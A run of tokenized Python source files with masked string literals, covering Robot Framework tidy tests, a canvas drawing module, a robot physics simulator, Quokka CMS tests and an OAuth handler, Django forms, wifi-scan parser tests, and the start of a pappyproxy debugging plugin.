<s> import unittest <EOL> import os <EOL> from robot . errors import DataError <EOL> from robot . tidy import TidyCommandLine <EOL> from robot . utils . asserts import assert_raises_with_msg , assert_equal , assert_true <EOL> class TestArgumentValidation ( unittest . TestCase ) : <EOL> def test_valid_explicit_format ( self ) : <EOL> opts , _ = self . _validate ( format = '<STR_LIT>' ) <EOL> assert_equal ( opts [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_valid_implicit_format ( self ) : <EOL> opts , _ = self . _validate ( args = [ __file__ , '<STR_LIT>' ] ) <EOL> assert_equal ( opts [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_no_format ( self ) : <EOL> opts , _ = self . _validate ( ) <EOL> assert_equal ( opts [ '<STR_LIT>' ] , None ) <EOL> def test_invalid_explicit_format ( self ) : <EOL> self . _validate ( format = '<STR_LIT>' , error = "<STR_LIT>" ) <EOL> def test_invalid_implicit_format ( self ) : <EOL> self . _validate ( args = [ __file__ , '<STR_LIT>' ] , error = "<STR_LIT>" ) <EOL> self . _validate ( args = [ __file__ , '<STR_LIT>' ] , error = "<STR_LIT>" ) <EOL> def test_no_space_count ( self ) : <EOL> opts , _ = self . _validate ( ) <EOL> assert_true ( '<STR_LIT>' not in opts ) <EOL> def test_valid_space_count ( self ) : <EOL> opts , _ = self . _validate ( spacecount = '<STR_LIT>' ) <EOL> assert_equal ( opts [ '<STR_LIT>' ] , <NUM_LIT> ) <EOL> def test_invalid_space_count ( self ) : <EOL> error = '<STR_LIT>' <EOL> self . _validate ( spacecount = '<STR_LIT>' , error = error ) <EOL> self . _validate ( spacecount = '<STR_LIT:1>' , error = error ) <EOL> def test_inplace_and_recursive_cannot_be_used_together ( self ) : <EOL> self . 
_validate ( inplace = True , recursive = True , <EOL> error = '<STR_LIT>' ) <EOL> def test_zero_argument_is_never_accepted ( self ) : <EOL> class Stubbed ( TidyCommandLine ) : <EOL> def _report_error ( self , message , ** args ) : <EOL> raise DataError ( message ) <EOL> for args in [ ] , [ '<STR_LIT>' ] , [ '<STR_LIT>' ] : <EOL> assert_raises_with_msg ( DataError , '<STR_LIT>' , <EOL> Stubbed ( ) . execute_cli , args ) <EOL> def test_default_mode_accepts_one_or_two_arguments ( self ) : <EOL> self . _validate ( args = [ __file__ ] ) <EOL> self . _validate ( args = [ __file__ , '<STR_LIT>' ] ) <EOL> self . _validate ( args = [ __file__ , '<STR_LIT:2>' , '<STR_LIT:3>' ] , <EOL> error = '<STR_LIT>' ) <EOL> def test_recursive_accepts_only_one_argument ( self ) : <EOL> self . _validate ( recursive = True , args = [ '<STR_LIT:.>' , '<STR_LIT:..>' ] , <EOL> error = '<STR_LIT>' ) <EOL> def test_inplace_accepts_one_or_more_arguments ( self ) : <EOL> for count in range ( <NUM_LIT:1> , <NUM_LIT:10> ) : <EOL> self . _validate ( inplace = True , args = [ __file__ ] * count ) <EOL> def test_default_mode_requires_input_to_be_file ( self ) : <EOL> error = '<STR_LIT>' <EOL> self . _validate ( args = [ '<STR_LIT:.>' ] , error = error ) <EOL> self . _validate ( args = [ '<STR_LIT>' ] , error = error ) <EOL> def test_inplace_requires_inputs_to_be_files ( self ) : <EOL> error = '<STR_LIT>' <EOL> self . _validate ( inplace = True , args = [ __file__ , '<STR_LIT:.>' ] , error = error ) <EOL> self . _validate ( inplace = True , args = [ __file__ , '<STR_LIT>' ] , error = error ) <EOL> def test_recursive_requires_input_to_be_directory ( self ) : <EOL> self . _validate ( recursive = True , <EOL> error = '<STR_LIT>' ) <EOL> def test_line_separator ( self ) : <EOL> for input , expected in [ ( None , os . linesep ) , ( '<STR_LIT>' , os . linesep ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:\r\n>' ) , ( '<STR_LIT>' , '<STR_LIT:\n>' ) ] : <EOL> opts , _ = self . 
_validate ( lineseparator = input ) <EOL> assert_equal ( opts [ '<STR_LIT>' ] , expected ) <EOL> def test_invalid_line_separator ( self ) : <EOL> self . _validate ( lineseparator = '<STR_LIT>' , <EOL> error = "<STR_LIT>" ) <EOL> def _validate ( self , inplace = False , recursive = False , format = None , <EOL> spacecount = None , lineseparator = None , args = [ __file__ ] , <EOL> error = None ) : <EOL> opts = { '<STR_LIT>' : inplace , '<STR_LIT>' : recursive , '<STR_LIT>' : format , <EOL> '<STR_LIT>' : spacecount , '<STR_LIT>' : lineseparator } <EOL> validate = lambda : TidyCommandLine ( ) . validate ( opts , args ) <EOL> if error : <EOL> assert_raises_with_msg ( DataError , error , validate ) <EOL> else : <EOL> return validate ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import math <EOL> class DrawableElement ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , pts , center , angle , color ) : <EOL> self . color = color <EOL> self . pts = pts <EOL> self . center = center <EOL> self . angle = angle <EOL> def initialize ( self , canvas ) : <EOL> self . canvas = canvas <EOL> self . id = self . canvas . create_polygon ( * self . pts , fill = self . color ) <EOL> def intersects ( self ) : <EOL> pass <EOL> def move ( self , v ) : <EOL> '''<STR_LIT>''' <EOL> vx , vy = v <EOL> vx , vy = vx * math . cos ( self . angle ) - vy * math . sin ( self . angle ) , vx * math . sin ( self . angle ) + vy * math . cos ( self . angle ) <EOL> def _move ( xy ) : <EOL> x , y = xy <EOL> return x + vx , y + vy <EOL> self . pts = [ p for p in map ( lambda x : _move ( x ) , self . pts ) ] <EOL> self . center = _move ( self . center ) <EOL> def rotate ( self , angle ) : <EOL> '''<STR_LIT>''' <EOL> self . angle = ( self . angle + angle ) % ( math . pi * <NUM_LIT> ) <EOL> c = math . cos ( angle ) <EOL> s = math . sin ( angle ) <EOL> px , py = self . center <EOL> def _rotate_point ( xy ) : <EOL> x , y = xy <EOL> x = x - px <EOL> y = y - py <EOL> return ( x * c - y * s ) + px , ( x * s + y * c ) + py <EOL> self . pts = [ p for p in map ( lambda x : _rotate_point ( x ) , self . pts ) ] <EOL> def set_color ( self , color ) : <EOL> self . color = color <EOL> self . canvas . itemconfig ( self . id , fill = color ) <EOL> def update_coordinates ( self ) : <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> pts = [ c for p in self . pts for c in p ] <EOL> self . canvas . coords ( self . id , * pts ) <EOL> def perform_move ( self ) : <EOL> self . update_coordinates ( ) <EOL> class CompositeElement ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self ) : <EOL> self . elements = [ ] <EOL> def initialize ( self , canvas ) : <EOL> for e in self . elements : <EOL> e . initialize ( canvas ) <EOL> def move ( self , v ) : <EOL> for e in self . 
elements : <EOL> e . move ( v ) <EOL> def rotate ( self , angle ) : <EOL> for e in self . elements : <EOL> e . rotate ( angle ) <EOL> def update_coordinates ( self ) : <EOL> for e in self . elements : <EOL> e . update_coordinates ( ) <EOL> class TextElement ( DrawableElement ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , text , center , angle , color , fontSize ) : <EOL> super ( ) . __init__ ( [ center ] , center , angle , color ) <EOL> self . text = text <EOL> self . fontSize = fontSize <EOL> def initialize ( self , canvas ) : <EOL> self . canvas = canvas <EOL> x , y = self . center <EOL> self . id = self . canvas . create_text ( y , x , text = self . text , <EOL> font = ( "<STR_LIT>" , self . fontSize , "<STR_LIT>" ) ) <EOL> self . set_color ( self . color ) <EOL> def perform_move ( self ) : <EOL> pass </s>
<s> from pyfrc . physics import drivetrains <EOL> class PhysicsEngine ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , physics_controller ) : <EOL> '''<STR_LIT>''' <EOL> self . physics_controller = physics_controller <EOL> self . position = <NUM_LIT:0> <EOL> self . physics_controller . add_analog_gyro_channel ( <NUM_LIT:1> ) <EOL> def update_sim ( self , hal_data , now , tm_diff ) : <EOL> '''<STR_LIT>''' <EOL> l_motor = hal_data [ '<STR_LIT>' ] [ <NUM_LIT:1> ] [ '<STR_LIT:value>' ] <EOL> r_motor = hal_data [ '<STR_LIT>' ] [ <NUM_LIT:2> ] [ '<STR_LIT:value>' ] <EOL> speed , rotation = drivetrains . two_motor_drivetrain ( l_motor , r_motor ) <EOL> self . physics_controller . drive ( speed , rotation , tm_diff ) <EOL> self . position += hal_data [ '<STR_LIT>' ] [ <NUM_LIT:4> ] [ '<STR_LIT:value>' ] * tm_diff * <NUM_LIT:3> <EOL> if self . position <= <NUM_LIT:0> : <EOL> switch1 = True <EOL> switch2 = False <EOL> elif self . position > <NUM_LIT:10> : <EOL> switch1 = False <EOL> switch2 = True <EOL> else : <EOL> switch1 = False <EOL> switch2 = False <EOL> hal_data [ '<STR_LIT>' ] [ <NUM_LIT:1> ] [ '<STR_LIT:value>' ] = switch1 <EOL> hal_data [ '<STR_LIT>' ] [ <NUM_LIT:2> ] [ '<STR_LIT:value>' ] = switch2 <EOL> hal_data [ '<STR_LIT>' ] [ <NUM_LIT:2> ] [ '<STR_LIT>' ] = self . position </s>
<s> """<STR_LIT>""" <EOL> from quokka import create_app <EOL> from quokka . core . models . content import Content <EOL> from quokka . core . models . config import Config <EOL> from quokka . core . models . channel import Channel <EOL> from quokka . modules . accounts . models import User <EOL> app = create_app ( ) <EOL> Content . objects . delete ( ) <EOL> User . objects . delete ( ) <EOL> Config . objects . delete ( ) <EOL> for channel in Channel . objects . filter ( parent__ne = None ) : <EOL> channel . delete ( ) <EOL> Channel . objects . delete ( ) </s>
<s> import sys <EOL> from . import BaseTestCase <EOL> from quokka . core . models . channel import Channel <EOL> from quokka . core . models . config import Config <EOL> from quokka . core . models . custom_values import CustomValue <EOL> if sys . version_info . major == <NUM_LIT:3> : <EOL> unicode = lambda x : u'<STR_LIT:{}>' . format ( x ) <EOL> class TestChannel ( BaseTestCase ) : <EOL> def setUp ( self ) : <EOL> self . parent , new = Channel . objects . get_or_create ( <EOL> title = u'<STR_LIT>' , <EOL> ) <EOL> self . channel , new = Channel . objects . get_or_create ( <EOL> title = u'<STR_LIT>' , <EOL> description = u'<STR_LIT>' , <EOL> parent = self . parent , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> ) <EOL> def tearDown ( self ) : <EOL> self . channel . delete ( ) <EOL> self . parent . delete ( ) <EOL> def test_channel_fields ( self ) : <EOL> self . assertEqual ( self . channel . title , u'<STR_LIT>' ) <EOL> self . assertEqual ( self . channel . slug , u'<STR_LIT>' ) <EOL> self . assertEqual ( self . channel . long_slug , u'<STR_LIT>' ) <EOL> self . assertEqual ( self . channel . mpath , u'<STR_LIT>' ) <EOL> self . assertEqual ( self . channel . description , <EOL> u'<STR_LIT>' ) <EOL> self . assertEqual ( self . channel . tags , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( self . channel . parent , self . parent ) <EOL> self . assertEqual ( unicode ( self . channel ) , u'<STR_LIT>' ) <EOL> def test_get_ancestors ( self ) : <EOL> self . assertEqual ( list ( self . channel . get_ancestors ( ) ) , [ self . channel , <EOL> self . parent ] ) <EOL> def test_get_ancestors_slug ( self ) : <EOL> self . assertEqual ( self . channel . get_ancestors_slugs ( ) , <EOL> [ u'<STR_LIT>' , u'<STR_LIT>' ] ) <EOL> def test_get_children ( self ) : <EOL> self . assertEqual ( list ( self . parent . get_children ( ) ) , [ self . channel ] ) <EOL> def test_get_descendants ( self ) : <EOL> self . assertEqual ( list ( self . parent . 
get_descendants ( ) ) , <EOL> [ self . parent , self . channel ] ) <EOL> def test_absolute_urls ( self ) : <EOL> self . assertEqual ( self . channel . get_absolute_url ( ) , <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( self . parent . get_absolute_url ( ) , <EOL> '<STR_LIT>' ) <EOL> def test_get_canonical_url ( self ) : <EOL> self . assertEqual ( self . channel . get_canonical_url ( ) , <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( self . parent . get_canonical_url ( ) , <EOL> '<STR_LIT>' ) <EOL> class TestConfig ( BaseTestCase ) : <EOL> def setUp ( self ) : <EOL> self . config , new = Config . objects . get_or_create ( <EOL> group = '<STR_LIT:test>' , <EOL> ) <EOL> self . config . values . append ( CustomValue ( name = '<STR_LIT>' , <EOL> rawvalue = u'<STR_LIT>' , <EOL> formatter = '<STR_LIT:text>' ) ) <EOL> def tearDown ( self ) : <EOL> self . config . delete ( ) <EOL> def test_config_fields ( self ) : <EOL> self . assertEqual ( self . config . group , u'<STR_LIT:test>' ) <EOL> self . assertEqual ( self . config . content_format , '<STR_LIT>' ) <EOL> self . assertFalse ( self . config . published ) <EOL> self . assertTrue ( self . config . values . count ( ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( unicode ( self . config ) , u'<STR_LIT:test>' ) <EOL> self . assertEqual ( self . config . values [ <NUM_LIT:0> ] . value , u'<STR_LIT>' ) </s>
<s> from flask import request , session , redirect , current_app , url_for <EOL> from flask . ext . security . utils import login_user <EOL> from . models import User , Connection <EOL> def clean_sessions ( ) : <EOL> for provider in current_app . config . get ( "<STR_LIT>" , { } ) : <EOL> session . pop ( '<STR_LIT>' % provider , None ) <EOL> session . pop ( '<STR_LIT>' % provider , None ) <EOL> def get_oauth_app ( provider ) : <EOL> provider_name = "<STR_LIT>" + provider <EOL> return getattr ( current_app , provider_name , None ) <EOL> def oauth_login ( provider ) : <EOL> oauth_app = get_oauth_app ( provider ) <EOL> clean_sessions ( ) <EOL> if provider == '<STR_LIT>' : <EOL> _next = None <EOL> else : <EOL> _next = request . args . get ( '<STR_LIT>' , request . referrer ) or None <EOL> return oauth_app . authorize ( <EOL> callback = url_for ( <EOL> '<STR_LIT>' . format ( provider ) , <EOL> _external = True , <EOL> next = _next <EOL> ) <EOL> ) <EOL> def make_oauth_handler ( provider ) : <EOL> def oauth_handler ( resp ) : <EOL> app = current_app <EOL> oauth_app = get_oauth_app ( provider ) <EOL> if not oauth_app : <EOL> return "<STR_LIT>" <EOL> oauth_app . tokengetter ( <EOL> lambda : session . get ( "<STR_LIT>" + provider + "<STR_LIT>" ) <EOL> ) <EOL> if resp is None : <EOL> return '<STR_LIT>' % ( <EOL> request . args [ '<STR_LIT>' ] , <EOL> request . args [ '<STR_LIT>' ] <EOL> ) <EOL> session [ "<STR_LIT>" + provider + "<STR_LIT>" ] = ( resp [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> data = app . config . get ( "<STR_LIT>" , { } ) . get ( provider ) <EOL> me = oauth_app . get ( data . get ( '<STR_LIT>' ) ) <EOL> if not any ( [ me . data . get ( '<STR_LIT>' ) , <EOL> me . data . get ( '<STR_LIT>' ) ] ) : <EOL> return "<STR_LIT>" <EOL> email = me . data . get ( '<STR_LIT:email>' ) <EOL> name = me . data . get ( '<STR_LIT:name>' ) <EOL> provider_user_id = me . data . get ( '<STR_LIT:id>' ) <EOL> profile_url = me . data . 
get ( '<STR_LIT>' ) <EOL> access_token = resp [ '<STR_LIT>' ] <EOL> try : <EOL> user = User . objects . get ( email = email ) <EOL> except User . DoesNotExist : <EOL> user = User ( <EOL> name = name , <EOL> email = email , <EOL> username = User . generate_username ( email ) <EOL> ) <EOL> user . save ( ) <EOL> try : <EOL> connection = Connection . objects . get ( <EOL> user_id = str ( user . id ) , <EOL> provider_id = provider , <EOL> ) <EOL> connection . access_token = access_token <EOL> connection . save ( ) <EOL> except Connection . DoesNotExist : <EOL> connection = Connection ( <EOL> user_id = str ( user . id ) , <EOL> provider_id = provider , <EOL> provider_user_id = provider_user_id , <EOL> profile_url = profile_url , <EOL> access_token = access_token <EOL> ) <EOL> connection . save ( ) <EOL> login_user ( user ) <EOL> _next = request . args . get ( <EOL> '<STR_LIT>' , request . referrer <EOL> ) or session . get ( <EOL> '<STR_LIT>' <EOL> ) or app . config . get ( '<STR_LIT>' , "<STR_LIT:/>" ) <EOL> return redirect ( _next ) <EOL> return oauth_handler </s>
<s> import pytz <EOL> from django . core . exceptions import ValidationError <EOL> from django . utils . translation import ugettext_lazy , ugettext as _ <EOL> from . models import ( Project , UserProfile , Package , ProjectDependency , <EOL> ProjectMember ) <EOL> from . utils . forms import ModelForm , JabberField <EOL> from . utils . parsers import get_parser , get_parser_choices <EOL> from . utils . pypi import normalize_name <EOL> from . tasks import sync_project <EOL> import floppyforms as forms <EOL> TIMEZONES = pytz . common_timezones <EOL> class AddProjectForm ( ModelForm ) : <EOL> requirements = forms . FileField ( required = False ) <EOL> parser = forms . ChoiceField ( choices = get_parser_choices ( ) ) <EOL> class Meta : <EOL> model = Project <EOL> fields = ( '<STR_LIT:name>' , '<STR_LIT>' ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . user = kwargs . pop ( '<STR_LIT:user>' ) <EOL> super ( AddProjectForm , self ) . __init__ ( * args , ** kwargs ) <EOL> def clean ( self ) : <EOL> cleaned_data = self . cleaned_data <EOL> data = cleaned_data . get ( '<STR_LIT>' , None ) <EOL> project_deps = [ ] <EOL> if data and '<STR_LIT>' in cleaned_data : <EOL> parser = get_parser ( cleaned_data [ '<STR_LIT>' ] ) <EOL> packages , missing = parser . parse ( data ) <EOL> packages = dict ( ( normalize_name ( k ) , v ) for k , v <EOL> in packages . iteritems ( ) ) <EOL> pkg_names = [ normalize_name ( name ) for name in packages . keys ( ) ] <EOL> known_packages = Package . objects . filter ( normalized_name__in = pkg_names ) . values_list ( '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' ) <EOL> known_package_names = map ( lambda x : x [ <NUM_LIT:1> ] , known_packages ) <EOL> normalized = ( normalize_name ( n ) for n in known_package_names ) <EOL> missing . extend ( set ( pkg_names ) . difference ( normalized ) ) <EOL> for normalized , name , pk in known_packages : <EOL> project_deps . 
append ( <EOL> ProjectDependency ( package_id = pk , <EOL> version = packages [ normalized ] ) ) <EOL> cleaned_data [ '<STR_LIT>' ] = project_deps <EOL> return cleaned_data <EOL> def save ( self , commit = True ) : <EOL> project = super ( AddProjectForm , self ) . save ( True ) <EOL> project . create_logentry ( '<STR_LIT>' , '<STR_LIT>' , self . user , name = project . name ) <EOL> ProjectMember . objects . create ( user = self . user , state = ProjectMember . OWNER , <EOL> project = project ) <EOL> deps = self . cleaned_data [ '<STR_LIT>' ] <EOL> for dep in deps : <EOL> dep . project = project <EOL> ProjectDependency . objects . bulk_create ( deps ) <EOL> sync_project . delay ( project . pk ) <EOL> return project <EOL> class ProjectDependencyForm ( ModelForm ) : <EOL> class Meta : <EOL> model = ProjectDependency <EOL> fields = ( '<STR_LIT:version>' , '<STR_LIT:id>' ) <EOL> class UpdateUserProfileForm ( ModelForm ) : <EOL> timezone = forms . ChoiceField ( label = ugettext_lazy ( '<STR_LIT>' ) , <EOL> required = True , <EOL> choices = zip ( TIMEZONES , TIMEZONES ) ) <EOL> jabber = JabberField ( required = False ) <EOL> email = forms . EmailField ( required = True ) <EOL> class Meta : <EOL> model = UserProfile <EOL> fields = ( '<STR_LIT:email>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> instance = kwargs . get ( '<STR_LIT>' , None ) <EOL> if instance is not None : <EOL> initial = kwargs . setdefault ( '<STR_LIT>' , { } ) <EOL> initial [ '<STR_LIT:email>' ] = instance . user . email <EOL> super ( UpdateUserProfileForm , self ) . __init__ ( * args , ** kwargs ) <EOL> class ProjectMemberForm ( ModelForm ) : <EOL> class Meta : <EOL> model = ProjectMember <EOL> fields = ( '<STR_LIT:id>' , '<STR_LIT:state>' ) <EOL> class CreateProjectMemberForm ( ModelForm ) : <EOL> class Meta : <EOL> model = ProjectMember <EOL> fields = ( '<STR_LIT:user>' , '<STR_LIT:state>' ) <EOL> class UpdateProjectDependencyForm ( forms . 
Form ) : <EOL> packages = forms . CharField ( widget = forms . Textarea , required = False ) <EOL> parser = forms . ChoiceField ( choices = get_parser_choices ( ) ) <EOL> def clean ( self ) : <EOL> cleaned_data = self . cleaned_data <EOL> if '<STR_LIT>' in cleaned_data and '<STR_LIT>' in cleaned_data : <EOL> data = cleaned_data [ '<STR_LIT>' ] <EOL> parser = get_parser ( cleaned_data [ '<STR_LIT>' ] ) <EOL> packages , missing_packages = parser . parse ( data . splitlines ( ) ) <EOL> pkg_names = [ normalize_name ( name ) for name in packages . keys ( ) ] <EOL> known_packages = set ( <EOL> Package . objects . filter ( normalized_name__in = pkg_names ) <EOL> . values_list ( '<STR_LIT>' , '<STR_LIT:name>' ) ) <EOL> pkg_mapping = dict ( known_packages ) <EOL> unknown_packages = set ( name for name in <EOL> set ( pkg_names ) . difference ( x [ <NUM_LIT:0> ] for x in known_packages ) ) <EOL> if unknown_packages : <EOL> raise ValidationError ( _ ( <EOL> '<STR_LIT>' ) % <EOL> '<STR_LIT:U+002CU+0020>' . join ( unknown_packages ) ) <EOL> if missing_packages : <EOL> raise ValidationError ( _ ( <EOL> '<STR_LIT>' ) % <EOL> '<STR_LIT:U+002CU+0020>' . join ( missing_packages ) ) <EOL> cleaned_data [ '<STR_LIT>' ] = packages <EOL> return cleaned_data </s>
<s> from unittest import TestCase <EOL> from wifi . scan import Cell <EOL> from wifi . exceptions import InterfaceError <EOL> class IWListParserTest ( TestCase ) : <EOL> def test_no_encryption ( self ) : <EOL> cell = Cell . from_string ( IWLIST_SCAN_NO_ENCRYPTION ) <EOL> self . assertFalse ( cell . encrypted ) <EOL> self . assertEqual ( cell . ssid , '<STR_LIT>' ) <EOL> self . assertEqual ( cell . signal , - <NUM_LIT> ) <EOL> self . assertEqual ( cell . quality , '<STR_LIT>' ) <EOL> self . assertEqual ( cell . frequency , '<STR_LIT>' ) <EOL> self . assertEqual ( cell . mode , '<STR_LIT>' ) <EOL> self . assertEqual ( cell . channel , <NUM_LIT:6> ) <EOL> def test_wep ( self ) : <EOL> cell = Cell . from_string ( IWLIST_SCAN_WEP ) <EOL> self . assertTrue ( cell . encrypted ) <EOL> self . assertEqual ( cell . encryption_type , '<STR_LIT>' ) <EOL> def test_wpa2 ( self ) : <EOL> cell = Cell . from_string ( IWLIST_SCAN_WPA2 ) <EOL> self . assertTrue ( cell . encrypted ) <EOL> self . assertEqual ( cell . encryption_type , '<STR_LIT>' ) <EOL> def test_wpa1 ( self ) : <EOL> cell = Cell . from_string ( IWLIST_SCAN_WPA1 ) <EOL> self . assertTrue ( cell . encrypted ) <EOL> self . assertEqual ( cell . encryption_type , '<STR_LIT>' ) <EOL> def test_alternative_iwlist_output ( self ) : <EOL> cell = Cell . from_string ( ALTERNATIVE_OUTPUT ) <EOL> self . assertEqual ( cell . quality , '<STR_LIT>' ) <EOL> self . assertEqual ( cell . signal , - <NUM_LIT> ) <EOL> def test_signal_level_out_of_sixty ( self ) : <EOL> cell = Cell . from_string ( ALTERNATIVE_OUTPUT2 ) <EOL> self . assertEqual ( cell . signal , - <NUM_LIT> ) <EOL> def test_noname_cell ( self ) : <EOL> cell = Cell . from_string ( NONAME_WIRELESS_NETWORK ) <EOL> self . assertEqual ( cell . ssid , '<STR_LIT>' ) <EOL> def test_no_channel_output ( self ) : <EOL> cell = Cell . from_string ( NO_CHANNEL_OUTPUT ) <EOL> self . assertEqual ( cell . channel , <NUM_LIT:11> ) <EOL> def test_list_index_error ( self ) : <EOL> cell = Cell . 
from_string ( LIST_INDEX_ERROR ) <EOL> def test_frequency_no_channel_output ( self ) : <EOL> cell = Cell . from_string ( FREQUENCY_NO_CHANNEL_OUTPUT ) <EOL> self . assertEqual ( cell . channel , <NUM_LIT> ) <EOL> def test_absolute_quality ( self ) : <EOL> cell = Cell . from_string ( ABSOLUTE_QUALITY ) <EOL> self . assertEqual ( cell . quality , '<STR_LIT>' ) <EOL> self . assertEqual ( cell . signal , - <NUM_LIT> ) <EOL> def test_blank_ssid ( self ) : <EOL> cell = Cell . from_string ( NO_SSID_AT_ALL ) <EOL> self . assertEqual ( cell . ssid , None ) <EOL> def test_noise_no_data ( self ) : <EOL> cell = Cell . from_string ( IWLIST_SCAN_NO_ENCRYPTION ) <EOL> self . assertEqual ( cell . noise , None ) <EOL> def test_noise_data_present ( self ) : <EOL> cell = Cell . from_string ( LIST_INDEX_ERROR ) <EOL> self . assertEqual ( cell . noise , - <NUM_LIT> ) <EOL> class ScanningTest ( TestCase ) : <EOL> def test_scanning ( self ) : <EOL> self . assertRaises ( InterfaceError , Cell . all , '<STR_LIT>' ) <EOL> IWLIST_SCAN_NO_ENCRYPTION = """<STR_LIT>""" <EOL> IWLIST_SCAN_WEP = """<STR_LIT>""" <EOL> IWLIST_SCAN_WPA2 = """<STR_LIT>""" <EOL> IWLIST_SCAN_WPA1 = """<STR_LIT>""" <EOL> ALTERNATIVE_OUTPUT = """<STR_LIT>""" <EOL> ALTERNATIVE_OUTPUT2 = """<STR_LIT>""" <EOL> NONAME_WIRELESS_NETWORK = """<STR_LIT>""" <EOL> NO_CHANNEL_OUTPUT = """<STR_LIT>""" <EOL> LIST_INDEX_ERROR = """<STR_LIT>""" <EOL> FREQUENCY_NO_CHANNEL_OUTPUT = """<STR_LIT>""" <EOL> ABSOLUTE_QUALITY = """<STR_LIT>""" <EOL> NO_SSID_AT_ALL = """<STR_LIT>""" </s>
<s> import gc <EOL> import shlex <EOL> import code <EOL> import crochet <EOL> import os <EOL> import resource <EOL> import random <EOL> import datetime <EOL> from pappyproxy . http import Request , post_request <EOL> from pappyproxy . util import PappyException <EOL> from pappyproxy . requestcache import RequestCache <EOL> from pappyproxy . util import print_requests <EOL> from pappyproxy . pappy import heapstats , session <EOL> from pappyproxy . plugin import require_modules <EOL> from twisted . internet import defer <EOL> def cache_info ( line ) : <EOL> c = Request . cache <EOL> print '<STR_LIT>' % ( len ( c . _cached_reqs ) , c . _cache_size ) <EOL> print '<STR_LIT>' . format ( c . hit_ratio , c . hits , c . hits + c . misses ) <EOL> print '<STR_LIT>' <EOL> if line != '<STR_LIT:q>' : <EOL> rl = [ v for k , v in Request . cache . _cached_reqs . iteritems ( ) ] <EOL> rs = sorted ( rl , key = lambda r : Request . cache . _last_used [ r . reqid ] , reverse = True ) <EOL> print_requests ( rs ) <EOL> @ require_modules ( '<STR_LIT>' ) <EOL> def memory_info ( line ) : <EOL> import psutil <EOL> proc = psutil . Process ( os . getpid ( ) ) <EOL> mem = proc . memory_info ( ) . rss <EOL> megabyte = ( float ( mem ) / <NUM_LIT> ) / <NUM_LIT> <EOL> print '<STR_LIT>' . format ( megabyte , mem ) <EOL> @ require_modules ( '<STR_LIT>' ) <EOL> def heap_info ( line ) : <EOL> size = heapstats . heap ( ) . size <EOL> print '<STR_LIT>' . format ( size / ( <NUM_LIT> * <NUM_LIT> ) ) <EOL> print heapstats . heap ( ) <EOL> def limit_info ( line ) : <EOL> rsrc = resource . RLIMIT_AS <EOL> soft , hard = resource . getrlimit ( rsrc ) <EOL> print '<STR_LIT>' , soft <EOL> print '<STR_LIT>' , hard <EOL> if line : <EOL> limit_mb = int ( line ) <EOL> limit_kb = int ( line ) * <NUM_LIT> <EOL> print '<STR_LIT>' % limit_mb <EOL> resource . setrlimit ( rsrc , ( limit_kb , hard ) ) <EOL> soft , hard = resource . 
getrlimit ( rsrc ) <EOL> print '<STR_LIT>' , soft <EOL> print '<STR_LIT>' , hard <EOL> @ require_modules ( '<STR_LIT>' ) <EOL> def graph_randobj ( line ) : <EOL> import objgraph <EOL> args = shlex . split ( line ) <EOL> if len ( args ) > <NUM_LIT:1> : <EOL> fname = args [ <NUM_LIT:1> ] <EOL> else : <EOL> fname = '<STR_LIT>' <EOL> print '<STR_LIT>' % args [ <NUM_LIT:0> ] <EOL> obj = random . choice ( objgraph . by_type ( args [ <NUM_LIT:0> ] ) ) <EOL> print '<STR_LIT>' <EOL> chain = objgraph . find_backref_chain ( obj , objgraph . is_proper_module ) <EOL> print '<STR_LIT>' <EOL> objgraph . show_chain ( chain , filename = fname ) <EOL> def heapdo ( line ) : <EOL> if heapstats is None : <EOL> raise PappyException ( '<STR_LIT>' ) <EOL> h = heapstats . heap ( ) <EOL> code . interact ( local = locals ( ) ) <EOL> def collect ( line ) : <EOL> gc . collect ( ) <EOL> @ crochet . wait_for ( timeout = None ) <EOL> @ defer . inlineCallbacks <EOL> def loadblock ( line ) : <EOL> args = shlex . split ( line ) <EOL> yield Request . cache . load ( args [ <NUM_LIT:0> ] , int ( args [ <NUM_LIT:1> ] ) ) <EOL> @ crochet . wait_for ( timeout = None ) <EOL> @ defer . inlineCallbacks <EOL> def big_fucking_data_file ( line ) : <EOL> print "<STR_LIT>" <EOL> for i in range ( <NUM_LIT:1000> ) : <EOL> if i % <NUM_LIT:20> == <NUM_LIT:0> : <EOL> print '<STR_LIT>' % i <EOL> r = post_request ( '<STR_LIT>' ) <EOL> r . body = '<STR_LIT:A>' * ( <NUM_LIT> * <NUM_LIT> ) <EOL> yield r . async_deep_save ( ) <EOL> def time_cmd ( line ) : <EOL> print '<STR_LIT>' % line <EOL> start = datetime . datetime . now ( ) <EOL> session . cons . onecmd ( line . strip ( ) ) <EOL> end = datetime . datetime . now ( ) <EOL> total_time = ( end - start ) . total_seconds ( ) <EOL> print '<STR_LIT>' . format ( line , total_time ) <EOL> def cache_data ( line ) : <EOL> args = shlex . split ( line ) <EOL> reqid = args [ <NUM_LIT:0> ] <EOL> cached = reqid in Request . cache . _cached_reqs <EOL> if reqid in Request . cache . 
